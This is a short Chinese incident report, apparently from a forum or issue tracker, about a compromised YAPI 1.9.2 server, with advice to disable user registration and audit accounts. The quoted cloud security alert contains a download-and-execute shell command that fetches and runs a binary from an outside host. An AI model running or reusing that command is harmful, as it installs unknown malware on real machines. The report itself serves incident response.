最近看到有人的YAPI接口管理平台服务器被黑了。发现这个漏洞好像部分还存在,漏洞利用前提还是在注册用户的前提下。所以应急方式也是先关闭注册功能,排查已经注册的用户。看看有没有恶意用户。
版本号
版本: 1.9.2
什么问题
服务器被入侵了, 阿里云报的:
-
-[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
-
-[26378] node server/app.js
-
-[31498] /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
-
-[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
-
-[26378] node server/app.js
-
-[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
-
-[26378] node server/app.js
-
-[31498] /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
-
-[31502] ./20000
-
-[31503] ./20000
-
该告警由如下引擎检测发现: